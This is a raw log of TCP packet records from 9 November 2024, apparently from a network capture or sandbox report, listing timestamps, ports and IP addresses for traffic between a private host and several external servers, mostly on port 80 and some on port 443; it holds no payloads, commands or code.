Nov 9, 2024 02:47:36.942178965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942186117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942192078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942198038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942203999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942210913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942217112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942251921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942276001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942286968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942297935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942341089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942362070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942368984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942409992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942471027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942477942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942523956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942563057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942569971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942574978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942580938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942591906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942614079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942620993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942643881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942647934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942655087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942697048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942699909 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.942729950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942737103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942743063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942764044 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.942801952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942823887 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.942864895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942871094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942914009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942919016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942926884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942940950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942945957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942956924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942970037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942989111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.943007946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.943103075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943109035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943120956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943160057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.943233967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943239927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943245888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943250895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943257093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943263054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943269014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943274975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.943291903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.943321943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.944834948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944840908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944848061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944854021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944859982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944865942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944878101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944895983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.944936037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.944978952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944989920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.944997072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945003033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945014000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945020914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945024967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945029020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945035934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945041895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945041895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945049047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945055008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945060968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945069075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945094109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945096016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945101976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945106030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945113897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945132971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945139885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945147991 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945152044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945158958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945173979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945180893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945187092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945187092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945200920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945204973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945219994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945231915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945235014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945242882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945250988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945255995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945261002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945261002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945271015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945276022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945282936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945287943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945295095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945301056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945307016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945307970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945313931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945319891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945327997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945333958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945338011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945341110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945360899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945365906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945373058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945380926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945435047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945441961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945447922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945450068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945485115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945487022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945502043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945507050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945547104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945580006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945585966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945602894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945628881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945633888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945633888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945676088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945746899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945755959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945760012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945770979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.945794106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.945825100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.950108051 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.950212955 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.957616091 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.957616091 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.957623005 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.957629919 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.964925051 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.964953899 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.965034008 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.966434002 CET	53077	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.966447115 CET	443	53077	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:37.014372110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.019423008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.041733027 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.041786909 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.042026043 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.043071032 CET	53078	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:37.043097019 CET	443	53078	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:37.062861919 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.062886000 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.062917948 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.062977076 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.062988997 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.063043118 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.063069105 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.065182924 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.065211058 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.065232038 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.065299034 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.065314054 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.065362930 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.070976019 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071002007 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071053028 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.071059942 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071094990 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.071111917 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.071783066 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071850061 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.071868896 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071886063 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071922064 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071948051 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.071958065 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.071990013 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.072026968 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.119590998 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119605064 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119613886 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119635105 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119640112 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119643927 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119718075 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.119725943 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.119771957 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.182883978 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.182908058 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.183005095 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.183026075 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.183058023 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.183079004 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.186850071 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.186911106 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.186944962 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.186955929 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.186989069 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.187006950 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.187042952 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.187100887 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.187108040 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.187138081 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.187194109 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.188011885 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.188021898 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.189143896 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.189163923 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.189210892 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.189218998 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.189251900 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.189268112 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.189697027 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.189759016 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.191567898 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.191586971 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.191628933 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.191636086 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.191660881 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.191682100 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.238769054 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.238780022 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.238816977 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.238851070 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.238861084 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.238863945 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:37.238914967 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:37.251085043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251101017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251106024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251120090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251164913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251183033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251185894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251194000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251213074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251225948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251239061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251262903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251266003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251272917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251285076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251291037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251296043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251329899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251342058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251440048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251447916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251508951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251513958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251522064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251528978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251554012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251610041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251648903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251694918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251722097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251728058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251740932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251770973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251784086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251853943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251861095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251873016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251878023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251909018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251923084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251929998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251935959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.251970053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.251993895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252022028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252027035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252068043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252074003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252080917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252087116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252104044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252110958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252116919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252120972 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252152920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252187014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252192974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252229929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252237082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252243042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252254009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252258062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252284050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252299070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252374887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252381086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252393007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252398014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252424955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252453089 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252461910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252469063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252474070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252480030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252490997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252502918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252504110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252533913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252545118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252574921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252580881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252592087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252598047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252604008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252621889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252643108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252650976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252727985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252732992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252743959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252751112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252774000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252796888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:37.252800941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252808094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:37.252819061 CET	80	52982	77.220.212.32	192.168.2.7
